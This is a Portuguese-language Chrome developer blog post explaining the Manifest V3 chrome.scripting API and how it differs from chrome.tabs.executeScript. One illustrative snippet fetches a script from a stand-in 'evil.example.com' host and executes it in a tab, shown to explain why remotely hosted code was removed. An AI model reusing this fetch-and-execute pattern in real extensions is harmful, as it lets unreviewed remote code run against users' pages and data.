Introdução ao chrome.scripting

Simeon Vincent
Simeon Vincent

O Manifest V3 introduz várias mudanças na plataforma de extensões do Chrome. Nesta postagem, vamos analisar as motivações e mudanças introduzidas por uma das mudanças mais notáveis: a introdução da API chrome.scripting.

O que é chrome.scripting?

Como o nome sugere, chrome.scripting é um novo namespace introduzido no Manifesto V3 responsável pelos recursos de injeção de script e estilo.

Os desenvolvedores que já criaram extensões do Chrome podem conhecer os métodos do Manifest V2 na API Tabs, como chrome.tabs.executeScript e chrome.tabs.insertCSS. Esses métodos permitem que as extensões injetem scripts e folhas de estilo nas páginas, respectivamente. No Manifesto V3, esses recursos foram movidos para chrome.scripting, e planejamos expandir essa API com alguns novos recursos no futuro.

Por que criar uma nova API?

Com uma mudança como essa, uma das primeiras perguntas que costumam surgir é "por quê?".

Vários fatores diferentes levaram a equipe do Chrome a decidir introduzir um novo namespace para scripts. Primeiro, a API Tabs é uma gaveta de recursos. Em segundo lugar, precisamos fazer mudanças importantes na API executeScript. Terceiro, sabíamos que queríamos expandir os recursos de script para extensões. Juntas, essas preocupações definiram claramente a necessidade de um novo namespace para armazenar recursos de script.

Gaveta de itens sem importância

Um dos problemas que tem incomodado a equipe de extensões nos últimos anos é que a API chrome.tabs está sobrecarregada. Quando essa API foi introduzida, a maioria dos recursos fornecidos estava relacionado ao conceito amplo de uma guia do navegador. Mesmo assim, ele era uma mistura de recursos, e com o passar dos anos, essa coleção só cresceu.

Quando o Manifest V3 foi lançado, a API Tabs cresceu para abranger o gerenciamento básico de guias, gerenciamento de seleção, organização de janelas, mensagens, controle de zoom, navegação básica, scripts e alguns outros recursos menores. Embora todos eles sejam importantes, pode ser um pouco confuso para os desenvolvedores no início e para a equipe do Chrome, já que mantemos a plataforma e consideramos as solicitações da comunidade de desenvolvedores.

Outro fator complicador é que a permissão tabs não é bem compreendida. Embora muitas outras permissões restrinjam o acesso a uma determinada API (por exemplo, storage), essa permissão é um pouco incomum porque concede à extensão acesso apenas a propriedades sensíveis em instâncias de guias. Além disso, ela também afeta a API do Windows. É compreensível que muitos desenvolvedores de extensões pensem erroneamente que precisam dessa permissão para acessar métodos na API Tabs, como chrome.tabs.create ou, mais especificamente, chrome.tabs.executeScript. A remoção da funcionalidade da API Tabs ajuda a esclarecer parte dessa confusão.

Alterações importantes

Ao projetar o Manifesto V3, um dos principais problemas que queríamos resolver era o abuso e o malware ativados por "código hospedado remotamente", que é executado, mas não incluído no pacote de extensão. É comum que autores de extensões abusivas executem scripts buscados de servidores remotos para roubar dados do usuário, injetar malware e evitar a detecção. Embora os agentes de ameaça também usem esse recurso, achamos que era muito perigoso manter o status quo.

Há algumas maneiras diferentes de as extensões executarem o código não agrupado, mas a relevante aqui é o método chrome.tabs.executeScript do Manifest V2. Esse método permite que uma extensão execute uma string arbitrária de código em uma guia de destino. Isso significa que um desenvolvedor malicioso pode buscar um script arbitrário de um servidor remoto e executá-lo em qualquer página que a extensão possa acessar. Sabíamos que, se quiséssemos resolver o problema do código remoto, precisaríamos abandonar esse recurso.

(async function() {
  let result = await fetch('https://evil.example.com/malware.js');
  let script = await result.text();

  chrome.tabs.executeScript({
    code: script,
  });
})();

Também queríamos corrigir alguns outros problemas mais sutis com o design da versão 2 do Manifest e tornar a API uma ferramenta mais refinada e previsível.

Embora pudéssemos mudar a assinatura desse método na API Tabs, achamos que, entre essas mudanças importantes e a introdução de novos recursos (abordados na próxima seção), uma mudança clara seria mais fácil para todos.

Ampliação dos recursos de script

Outra consideração que influenciou o processo de design do Manifest V3 foi o desejo de introduzir mais recursos de script na plataforma de extensões do Chrome. Especificamente, queríamos adicionar suporte a scripts de conteúdo dinâmico e expandir os recursos do método executeScript.

O suporte a scripts de conteúdo dinâmico é um recurso solicitado há muito tempo no Chromium. Atualmente, as extensões do Manifest V2 e V3 do Chrome só podem declarar estaticamente scripts de conteúdo no arquivo manifest.json. A plataforma não oferece uma maneira de registrar novos scripts de conteúdo, ajustar o registro ou cancelar o registro de scripts de conteúdo no momento da execução.

Sabíamos que queríamos resolver esse pedido de recurso no Manifest V3, mas nenhuma das nossas APIs parecia ser a certa. Também consideramos nos alinhar ao Firefox na API Content Scripts, mas identificamos algumas desvantagens importantes dessa abordagem. Primeiro, sabíamos que teríamos assinaturas incompatíveis (por exemplo, a remoção do suporte à propriedade code). Em segundo lugar, nossa API tinha um conjunto diferente de restrições de design (por exemplo, precisava de um registro para persistir além da vida útil de um worker de serviço). Por fim, esse namespace também nos levaria a funcionalidades de script de conteúdo em que pensamos em scripts em extensões de maneira mais ampla.

Em relação à executeScript, também queríamos expandir o que essa API poderia fazer além do que a versão da API Tabs oferecia. Mais especificamente, queríamos oferecer suporte a funções e argumentos, segmentar frames específicos com mais facilidade e segmentar contextos que não sejam "guias".

De agora em diante, também estamos considerando como as extensões podem interagir com PWAs instalados e outros contextos que não são mapeados conceitualmente para "guias".

Mudanças entre tabs.executeScript e scripting.executeScript

No restante desta postagem, gostaria de analisar as semelhanças e diferenças entre chrome.tabs.executeScript e chrome.scripting.executeScript.

Como injetar uma função com argumentos

Ao considerar como a plataforma precisaria evoluir devido às restrições de código hospedado remotamente, queríamos encontrar um equilíbrio entre o poder bruto da execução de código arbitrário e permitir apenas scripts de conteúdo estático. A solução que encontramos foi permitir que as extensões injetassem uma função como um script de conteúdo e transmitissem uma matriz de valores como argumentos.

Vamos conferir um exemplo (simplificado demais). Digamos que queremos injetar um script que cumprimente o usuário pelo nome quando ele clicar no botão de ação da extensão (ícone na barra de ferramentas). No Manifest V2, podemos construir dinamicamente uma string de código e executar esse script na página atual.

// Manifest V2 extension
chrome.browserAction.onClicked.addListener(async (tab) => {
  let userReq = await fetch('https://example.com/greet-user.js');
  let userScript = await userReq.text();

  chrome.tabs.executeScript({
    // userScript == 'alert("Hello, <GIVEN_NAME>!")'
    code: userScript,
  });
});

Embora as extensões do Manifest V3 não possam usar códigos que não estão agrupados com a extensão, nosso objetivo era preservar parte do dinamismo que os blocos de código arbitrários ativaram para as extensões do Manifest V2. A abordagem de função e argumentos permite que os revisores, usuários e outras partes interessadas da Chrome Web Store avaliem com mais precisão os riscos de uma extensão, além de permitir que os desenvolvedores modifiquem o comportamento de execução de uma extensão com base nas configurações do usuário ou no estado do aplicativo.

// Manifest V3 extension
function greetUser(name) {
  alert(`Hello, ${name}!`);
}
chrome.action.onClicked.addListener(async (tab) => {
  let userReq = await fetch('https://example.com/user-data.json');
  let user = await userReq.json();
  let givenName = user.givenName || '<GIVEN_NAME>';

  chrome.scripting.executeScript({
    target: {tabId: tab.id},
    func: greetUser,
    args: [givenName],
  });
});

Segmentar frames

Também queríamos melhorar a interação dos desenvolvedores com os frames na API revisada. A versão V2 do manifesto de executeScript permitia que os desenvolvedores segmentassem todos os frames em uma guia ou um frame específico na guia. É possível usar chrome.webNavigation.getAllFrames para receber uma lista de todos os frames em uma guia.

// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.webNavigation.getAllFrames({tabId: tab.id}, (frames) => {
    let frame1 = frames[0].frameId;
    let frame2 = frames[1].frameId;

    chrome.tabs.executeScript(tab.id, {
      frameId: frame1,
      file: 'content-script.js',
    });
    chrome.tabs.executeScript(tab.id, {
      frameId: frame2,
      file: 'content-script.js',
    });
  });
});

No Manifest V3, substituímos a propriedade opcional de número inteiro frameId no objeto de opções por uma matriz opcional de números inteiros frameIds. Isso permite que os desenvolvedores segmentem vários frames em uma única chamada de API.

// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
  let frames = await chrome.webNavigation.getAllFrames({tabId: tab.id});
  let frame1 = frames[0].frameId;
  let frame2 = frames[1].frameId;

  chrome.scripting.executeScript({
    target: {
      tabId: tab.id,
      frameIds: [frame1, frame2],
    },
    files: ['content-script.js'],
  });
});

Resultados da injeção de script

Também melhoramos a forma como retornamos os resultados da injeção de script no Manifest V3. Um "resultado" é basicamente a instrução final avaliada em um script. Pense nisso como o valor retornado quando você chama eval() ou executa um bloco de código no console do Chrome DevTools, mas serializado para transmitir resultados entre processos.

No Manifest V2, executeScript e insertCSS retornavam uma matriz de resultados de execução simples. Isso é aceitável se você tiver apenas um ponto de injeção, mas a ordem dos resultados não é garantida ao injetar em vários frames. Portanto, não há como saber qual resultado está associado a qual frame.

Como exemplo concreto, vamos analisar as matrizes results retornadas por um Manifest V2 e uma versão do Manifest V3 da mesma extensão. Ambas as versões da extensão vão injetar o mesmo script de conteúdo, e vamos comparar os resultados na mesma página de demonstração.

// content-script.js
var headers = document.querySelectorAll('p');
headers.length;

Quando executamos a versão V2 do manifesto, recebemos uma matriz de [1, 0, 5]. Qual resultado corresponde ao frame principal e qual é para o iframe? O valor de retorno não informa, então não sabemos com certeza.

// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.tabs.executeScript({
    allFrames: true,
    file: 'content-script.js',
  }, (results) => {
    // results == [1, 0, 5]
    for (let result of results) {
      if (result > 0) {
        // Do something with the frame... which one was it?
      }
    }
  });
});

Na versão 3 do manifesto, results agora contém uma matriz de objetos de resultado em vez de uma matriz de apenas os resultados da avaliação, e os objetos de resultado identificam claramente o ID do frame para cada resultado. Isso facilita muito a utilização do resultado e a ação dos desenvolvedores em um frame específico.

// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
  let results = await chrome.scripting.executeScript({
    target: {tabId: tab.id, allFrames: true},
    files: ['content-script.js'],
  });
  // results == [
  //   {frameId: 0, result: 1},
  //   {frameId: 1235, result: 5},
  //   {frameId: 1234, result: 0}
  // ]

  for (let result of results) {
    if (result.result > 0) {
      console.log(`Found ${result} p tag(s) in frame ${result.frameId}`);
      // Found 1 p tag(s) in frame 0
      // Found 5 p tag(s) in frame 1235
    }
  }
});

Conclusão

As atualizações de versão do manifesto são uma oportunidade rara para repensar e modernizar as APIs de extensões. Nosso objetivo com o Manifest V3 é melhorar a experiência do usuário final, tornando as extensões mais seguras e melhorando a experiência do desenvolvedor. Com a introdução do chrome.scripting no Manifest V3, foi possível limpar a API Tabs, reimaginar o executeScript para uma plataforma de extensões mais segura e preparar o terreno para novos recursos de script que serão lançados ainda este ano.